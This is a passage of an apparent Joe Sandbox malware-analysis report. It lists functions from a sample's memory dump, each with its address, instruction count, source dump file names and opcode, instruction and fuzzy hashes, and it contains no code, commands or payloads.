                              • Opcode ID: 3cdd73544602a3f7999f1f1cb80c155f346cabd849bc4ef9914acf22a8d09468
                              • Instruction ID: 9bf783cf7742847c70e973ad5aec3d5f2b1e7c40b50dfed86a95b7234c04668c
                              • Opcode Fuzzy Hash: 3cdd73544602a3f7999f1f1cb80c155f346cabd849bc4ef9914acf22a8d09468
                              • Instruction Fuzzy Hash: BA51B230A2DA198FFB95E72C94652B973E2FF89310FA4007AE00DC33E2DD2968428741
                              Function 00007FFF60F6D4F5 Relevance: .2, Instructions: 158COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6420231bc8741a1535e276be49d0dedad47e5563ce57b23c363ec386c86eeab2
                              • Instruction ID: bbe6c454769b1243f2ac84d52395301c677c034d7fb44fbab06a6c1ef25e0e86
                              • Opcode Fuzzy Hash: 6420231bc8741a1535e276be49d0dedad47e5563ce57b23c363ec386c86eeab2
                              • Instruction Fuzzy Hash: 7551CE62C6D6678AEBA5E6189461679B3D4EF55304FBD0579F40ED33C2DE09BC00B381
                              Function 00007FFF60F61318 Relevance: .2, Instructions: 153COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 30bf039b4a90cfd31c810a39920e0c2e4f3a0366eedf286185f0352edeb07937
                              • Instruction ID: c8ec49efacb75d3673639c472d9ff435ad77b64dd8ce75c22089bd6cc8a8b059
                              • Opcode Fuzzy Hash: 30bf039b4a90cfd31c810a39920e0c2e4f3a0366eedf286185f0352edeb07937
                              • Instruction Fuzzy Hash: D5511535D0D1968FEB65E724A8165F97BD0EF51320F2401BAD098C72E2EF1C784A8393
                              Function 00007FFF60F61B25 Relevance: .2, Instructions: 152COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 09b679822063f78c797101efe583578cba0bc8e379e6d51b4fd4f95289bffbe6
                              • Instruction ID: 7339f063e301cf9e7b2a39062ca0df8910de8a78eb5737ebaab9f93f176240f8
                              • Opcode Fuzzy Hash: 09b679822063f78c797101efe583578cba0bc8e379e6d51b4fd4f95289bffbe6
                              • Instruction Fuzzy Hash: 7841B401F2C51B46E6887BB8215A1BF09E79F85302FE54878F24DDBBCFDD69AA021251
                              Function 00007FFF60F6C12F Relevance: .1, Instructions: 140COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 54218c87d7a84b1c30512fa05f5bf88563349b77d93aaf76ae20cb648103dc64
                              • Instruction ID: 2e032f1c8eee75f60bb2ef9d342222323de556bf5c34b36bf4c1f7b4093ef50e
                              • Opcode Fuzzy Hash: 54218c87d7a84b1c30512fa05f5bf88563349b77d93aaf76ae20cb648103dc64
                              • Instruction Fuzzy Hash: 86416F71E2C54ACEEF94E76884652BC77E5EF5A300FA40879E48DD7392ED286805A3C1
                              Function 00007FFF60F61B8F Relevance: .1, Instructions: 139COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f6ff849b3b85c73d1a48ec6c20451718f2b1469d1cdeb8e33c1f849098b45373
                              • Instruction ID: 5a336b2c152cff86d5749aff4a272c0888e9a6a623be0bcdc59dd01f12dddc78
                              • Opcode Fuzzy Hash: f6ff849b3b85c73d1a48ec6c20451718f2b1469d1cdeb8e33c1f849098b45373
                              • Instruction Fuzzy Hash: 65416601F2C51B46E6487BB8215A1BF49E79F84302FF54878F24DDBBCFDDA9AA021251
                              Function 00007FFF60F627F3 Relevance: .1, Instructions: 133COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 819700f1c76e11dc17dffbf96653f7d4d7b47380ef56b7bf03d2b45af0650fe1
                              • Instruction ID: 22ff71dc483d8daa1c923c215dc5e55378daab188f93c24a0d384790c6b80348
                              • Opcode Fuzzy Hash: 819700f1c76e11dc17dffbf96653f7d4d7b47380ef56b7bf03d2b45af0650fe1
                              • Instruction Fuzzy Hash: A0412E21F2C91A8BEB88E73894A957976E3FF98302F950879E10DC73C6DD38AC419740
                              Function 00007FFF60F627D0 Relevance: .1, Instructions: 131COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc8f05e7799976b76201bd7eb512100754cb6f96327d30af2d29e4869b8f8d20
                              • Instruction ID: f5b1e2d30106c569172321aa2d6781a7aa73ad670d99db32fe931b3cb761168c
                              • Opcode Fuzzy Hash: fc8f05e7799976b76201bd7eb512100754cb6f96327d30af2d29e4869b8f8d20
                              • Instruction Fuzzy Hash: 71411121F28D1A9BEB88E73884A967976E3FB98312FD50839E10DC73D6DD39AC415740
                              Function 00007FFF60F6E97E Relevance: .1, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b991fb5bf5afda8c111ffb5968a19d372d39edbc5f28812d061b0950da6f7558
                              • Instruction ID: 491ccaefa2728007f82b36e307f29563c460536a7d69a89b7eab5ee1e797f315
                              • Opcode Fuzzy Hash: b991fb5bf5afda8c111ffb5968a19d372d39edbc5f28812d061b0950da6f7558
                              • Instruction Fuzzy Hash: 13410313C3CC7A85FBA476689C553BA53D8FF55325F990474E84EA73C2EC1C6C816681
                              Function 00007FFF60F615A0 Relevance: .1, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3900a88d89d0b85b1059271329e497fca0bb4a8b23591279661a16446c6931cf
                              • Instruction ID: 1d755ec46512d84d7a59140d987df45023c7a126597e09a5ff86a392e0d105c9
                              • Opcode Fuzzy Hash: 3900a88d89d0b85b1059271329e497fca0bb4a8b23591279661a16446c6931cf
                              • Instruction Fuzzy Hash: 7A414E34E6C91ACFEBA4EB2894657B973E1FF48300FA14179E40DD3381CE79A8458B81
                              Function 00007FFF60F6C570 Relevance: .1, Instructions: 122COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b62b50445bea425ecb1645099847bbd33d32ee8b2055042e232ff8b684b15d05
                              • Instruction ID: 23276f2fa96c3db51a4b72ded5eabe5cf9a2f12d86343fa146072064d5645207
                              • Opcode Fuzzy Hash: b62b50445bea425ecb1645099847bbd33d32ee8b2055042e232ff8b684b15d05
                              • Instruction Fuzzy Hash: 5E318462C2C9568AFF64B1189C652B437D8DF65311F2918B2F88DC73D2ED1D7C8A12CA
                              Function 00007FFF60F74EE9 Relevance: .1, Instructions: 118COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a459b2acc21128aa6c6738ecc3a6f896912b4c347366b5b40f49dc2c633c196c
                              • Instruction ID: 2747deb6f9d98a7757e8249eabc9ceb018e3e045e8bacf9b9a650de883afb6fe
                              • Opcode Fuzzy Hash: a459b2acc21128aa6c6738ecc3a6f896912b4c347366b5b40f49dc2c633c196c
                              • Instruction Fuzzy Hash: 6C417B2594E7C69FE7569764A8155A87FF0EF47314F2900FBD088CB2A3DB1C68198363
                              Function 00007FFF60F680B6 Relevance: .1, Instructions: 112COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e6574b9b11e8ddc046ce460d24f290bfe3fc8bf1fc7e98b12680bdbcda610e3e
                              • Instruction ID: a27582c12ef7cfce4b394628d61fd6180290dbfefdc173e88d66d4737b090bbc
                              • Opcode Fuzzy Hash: e6574b9b11e8ddc046ce460d24f290bfe3fc8bf1fc7e98b12680bdbcda610e3e
                              • Instruction Fuzzy Hash: BA31E43190CA899FDB1ADB6888497E97FE0EF57320F14425FD049C3293DBA95446CB91
                              Function 00007FFF60F6BF71 Relevance: .1, Instructions: 108COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9a6a995a6533dfc5bdfb0af91e26e740cb43c4eb348e5b180a914f8542045b53
                              • Instruction ID: 6660c079ec399f012b85b7aaae9ebf5a7fa1048031a79d8729ab9fe63eda7287
                              • Opcode Fuzzy Hash: 9a6a995a6533dfc5bdfb0af91e26e740cb43c4eb348e5b180a914f8542045b53
                              • Instruction Fuzzy Hash: 80311931A18A1C8FDF94EB68D889BEDB7F1FB68311F10416AD44ED3251DF34A9868B41
                              Function 00007FFF60F6CE39 Relevance: .1, Instructions: 105COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 09052436ce1edfd34f5f5f89a85b73e6720f68dc4261a346e196284021f6df43
                              • Instruction ID: f2d12fd69553199be1cfaac8a24ef5482780de0d911fcca15e751abdbf21b95a
                              • Opcode Fuzzy Hash: 09052436ce1edfd34f5f5f89a85b73e6720f68dc4261a346e196284021f6df43
                              • Instruction Fuzzy Hash: 6231093091D98ACFDB85EB68C8246F97BF5EF99310B1541FBE04DC7292CE2C98418791
                              Function 00007FFF60F6ADE9 Relevance: .1, Instructions: 92COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c2d8303661de8f166c420c04118d2168e349249d24334ced05ef95ff5b38a746
                              • Instruction ID: bc3d568f9fdda8406ca50ea905510f3f7cf86798ab2f1f9f300f60a489c736b8
                              • Opcode Fuzzy Hash: c2d8303661de8f166c420c04118d2168e349249d24334ced05ef95ff5b38a746
                              • Instruction Fuzzy Hash: F8311031E2C82ACFEB98FB28C8956F877E5EF58305F600179E40DD3392DE2968459B41
                              Function 00007FFF60F6CD09 Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 19bf33640e4f18552241b497f48a91d0558c0c50a8bc862738d9835beb90a335
                              • Instruction ID: b71bbe04bf30c0ce276e2551291d92a9468d0a6f78c8cdb884136b279db220c8
                              • Opcode Fuzzy Hash: 19bf33640e4f18552241b497f48a91d0558c0c50a8bc862738d9835beb90a335
                              • Instruction Fuzzy Hash: 1A31BC3092D6C98FEB569B6488651B87FF0EF06300F6905FBD499CB2D3CE2D68149792
                              Function 00007FFF60F61580 Relevance: .1, Instructions: 87COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a2a198c861b13ae0b2818120e99b50d7d9467962fc438cefd003642069e7fa46
                              • Instruction ID: aca35ac28ae3a91cfdbbf4aa4f37018a7dd35171df168c899d00b23e53bac305
                              • Opcode Fuzzy Hash: a2a198c861b13ae0b2818120e99b50d7d9467962fc438cefd003642069e7fa46
                              • Instruction Fuzzy Hash: 2921C530E5C52B9BEBE8EA2C945577A22D6EF98310F650539F40EC33C2DD28AC059382
                              Function 00007FFF60F72E30 Relevance: .1, Instructions: 85COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2b89cc93a88c73e69e38d1aafc37c771a48ee9e8c4e4f66fa33d4126a91b6f61
                              • Instruction ID: a0cf21aa660e412b8b6a3c9943657410074354cd06e0c8b9f8fdf4426ffe26b2
                              • Opcode Fuzzy Hash: 2b89cc93a88c73e69e38d1aafc37c771a48ee9e8c4e4f66fa33d4126a91b6f61
                              • Instruction Fuzzy Hash: C521F339F1C50B8AFBA4E668A4426BE73D6DFD4350F244036D84DC3385EE69AC824382
                              Function 00007FFF60F67E76 Relevance: .1, Instructions: 83COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fada23002be330be8805f686aeb37382cb921f49a10837f2ebb953c55b88b8d8
                              • Instruction ID: 13f8de64dcdce8afa6a04cdad321abca6f4e4f3c7e372ddec30f80e477c0bf79
                              • Opcode Fuzzy Hash: fada23002be330be8805f686aeb37382cb921f49a10837f2ebb953c55b88b8d8
                              • Instruction Fuzzy Hash: CB314A30518B8C8FEB64DF28C845BD97BE1FF98710F10866AE84DC7255CB38A545CB81
                              Function 00007FFF60F6D724 Relevance: .1, Instructions: 81COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c9fa7e33e79199c1e90b46b2ddffe2403aa64fb1fa52a13206a1144cc08b88cd
                              • Instruction ID: 23b7e797a9e2d064f772b7567bb4ff6683f25d1316a43825120004aa0e31e82d
                              • Opcode Fuzzy Hash: c9fa7e33e79199c1e90b46b2ddffe2403aa64fb1fa52a13206a1144cc08b88cd
                              • Instruction Fuzzy Hash: DF112936D5C48B8BE750B73898055F977E8EB85365F2402B6F50DCB2C2ED1D98464392
                              Function 00007FFF60F6D8D6 Relevance: .1, Instructions: 77COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5c5934a01e42696cda6412c63d01dd92d977ccb8e7670c85ed076930d954390b
                              • Instruction ID: 619566d037a57be5b5375734db4146ffc4a15f6dd42db05e227608c3df63b7be
                              • Opcode Fuzzy Hash: 5c5934a01e42696cda6412c63d01dd92d977ccb8e7670c85ed076930d954390b
                              • Instruction Fuzzy Hash: 83216031E2991E8FEB88FB2CD4556B8B3E5FF58311B6000B9E80DD3392DE25AC418B40
                              Function 00007FFF60F6DA7A Relevance: .1, Instructions: 76COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 30150742116420683975c10e2d3818fa550fa7b00fc1f8903d4e24e6d36afe12
                              • Instruction ID: e512c2d6bd4a17356e2c4a41b2b53a1937e4fc5e4ee10472d20715565ff7531f
                              • Opcode Fuzzy Hash: 30150742116420683975c10e2d3818fa550fa7b00fc1f8903d4e24e6d36afe12
                              • Instruction Fuzzy Hash: 73118724F3D92B8AE6A9B76C446557DA3C5EF98740BB50178F40EC33C7CD186C016780
                              Function 00007FFF60F63AC0 Relevance: .1, Instructions: 76COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4f0f061e74d2befab2beec3ae51db542600649c34f8ca68185c9ce0a023662c4
                              • Instruction ID: 272422e98bd7f150491fdacbfe1c94b8c7196f4364a1b08e2ecb296d913727bb
                              • Opcode Fuzzy Hash: 4f0f061e74d2befab2beec3ae51db542600649c34f8ca68185c9ce0a023662c4
                              • Instruction Fuzzy Hash: D6110611E2D5C79BE766666488192793BE4CF53201F2902FFE848C73C3ED8C68075352
                              Function 00007FFF60F61328 Relevance: .1, Instructions: 74COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cf542bc23964e6821bb333e78b3ede0d28527a3602d5a91de46957fed0e67668
                              • Instruction ID: e6708f8d60dae3e8d9d210493e180db4822a9b4c5e2b333e6662f6ea07c1174b
                              • Opcode Fuzzy Hash: cf542bc23964e6821bb333e78b3ede0d28527a3602d5a91de46957fed0e67668
                              • Instruction Fuzzy Hash: 34114235E1881E9FEB94FB6CD4456BD77E2EF98301F110036D50ED3290DE34A8458782
                              Function 00007FFF60F69533 Relevance: .1, Instructions: 73COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 568701692bd07e166fa341bfed3728e25d2e7135763b27a7de1861afd7113df6
                              • Instruction ID: 5bcfb39985fe6247d6a2070d0af3bffd5433d082f59cc2180b1dbd5550269749
                              • Opcode Fuzzy Hash: 568701692bd07e166fa341bfed3728e25d2e7135763b27a7de1861afd7113df6
                              • Instruction Fuzzy Hash: AB114231D2C61B8AFB09A79CE4811F977DCEF10324F64007AE54EE2296ED1EA9425285
                              Function 00007FFF60F6D757 Relevance: .1, Instructions: 72COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fbe684006db2ba1f454405886af125ab72766701e1e5d90b9dfab1933f29edb3
                              • Instruction ID: 0b9861f232b8fc3f2543a3d2bd501892c0a0341b96240197d3dbd961cd223d05
                              • Opcode Fuzzy Hash: fbe684006db2ba1f454405886af125ab72766701e1e5d90b9dfab1933f29edb3
                              • Instruction Fuzzy Hash: CB113161D5D2838FE71567385C122A93BF4EF42321F2901B7E548CB2C3ED2C584683A3
                              Function 00007FFF60F6BC3F Relevance: .1, Instructions: 68COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8ce4d54f4e7b974d2561b1dd120ff35bfbf0ed45971717399e13103531d39581
                              • Instruction ID: 3bda410a2e81ade8165d760a7a6faa3e5f76624d5ec0ef192bfe366cf57777e9
                              • Opcode Fuzzy Hash: 8ce4d54f4e7b974d2561b1dd120ff35bfbf0ed45971717399e13103531d39581
                              • Instruction Fuzzy Hash: A711B630E6C94E8AFBACDA2884653BD77D5EB95310F200A3EF10FD73D1DD2859855682
                              Function 00007FFF60F62E59 Relevance: .1, Instructions: 66COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1ab91c89cf96162632d4e4445f181b3d944a254f5c4bcf580019da37c36da821
                              • Instruction ID: e2eb770d69d0eab6e27df0d15f3a84c6f7cffad2f8775b4961132e6cb3a63733
                              • Opcode Fuzzy Hash: 1ab91c89cf96162632d4e4445f181b3d944a254f5c4bcf580019da37c36da821
                              • Instruction Fuzzy Hash: FC11B422F2C8078AEB986778889517A23D6CFA5311F640674E01DC77D6ED2E68475281
                              Function 00007FFF60F6C6FF Relevance: .1, Instructions: 59COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8fd821e3bbbff1a37943aca7afac90f8318dcb225f712c7da826e2ecf2d39a23
                              • Instruction ID: 6a06c77185d040ebe00ced58d734bb3790365ffb49541638d1ee133c2759f26e
                              • Opcode Fuzzy Hash: 8fd821e3bbbff1a37943aca7afac90f8318dcb225f712c7da826e2ecf2d39a23
                              • Instruction Fuzzy Hash: 65017133E2C5298AFF58A258E8420F8B3D5EB45330F15043BE58E936D2DD1A2C135685
                              Function 00007FFF60F72D20 Relevance: .1, Instructions: 58COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: afb70c30c99601f74a8471e41fee36dc9b057e6632410f08646c47ac8664f9dc
                              • Instruction ID: 8d2185e4256d906b6b2fc05a900a2718c4ac9e7844d0dbe1364594429b6d136d
                              • Opcode Fuzzy Hash: afb70c30c99601f74a8471e41fee36dc9b057e6632410f08646c47ac8664f9dc
                              • Instruction Fuzzy Hash: EB11823AE0C51BC6FBB8F618E8462B873D0EF54341F640479E80DC2391EE2A6C164683
                              Function 00007FFF60F63509 Relevance: .1, Instructions: 58COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 469c81c7079d30674ad662beb8e8bdb09ead8426794cc3a537199fd90b53e9eb
                              • Instruction ID: 3bdbc3653bd155186f446bdeda7ed433ac1d01df302e8fbd47c2e828325eb3e3
                              • Opcode Fuzzy Hash: 469c81c7079d30674ad662beb8e8bdb09ead8426794cc3a537199fd90b53e9eb
                              • Instruction Fuzzy Hash: 03017532F6D86A8FFAA4A63C90552B8A3C6DB98361F5900B9E80ED7391DC1D6C415781
                              Function 00007FFF60F6234F Relevance: .1, Instructions: 58COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3001b15db19967db192c51872420b8aed9b665fe4c71b218ca4efd0feb817670
                              • Instruction ID: d7d8d553809cd00668658fda2ec0e4b63a5f910dc1b7fb0ad44e343afeae3a4d
                              • Opcode Fuzzy Hash: 3001b15db19967db192c51872420b8aed9b665fe4c71b218ca4efd0feb817670
                              • Instruction Fuzzy Hash: E7110D20E2C91382FBE8A26898471BA22C9CF64316F741534E54DC73D6FE1EBC1B6192
                              Function 00007FFF60F6DB7A Relevance: .1, Instructions: 58COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000013.00000002.3353351745.00007FFF60F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF60F60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_7fff60f60000_pto2q1ow.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
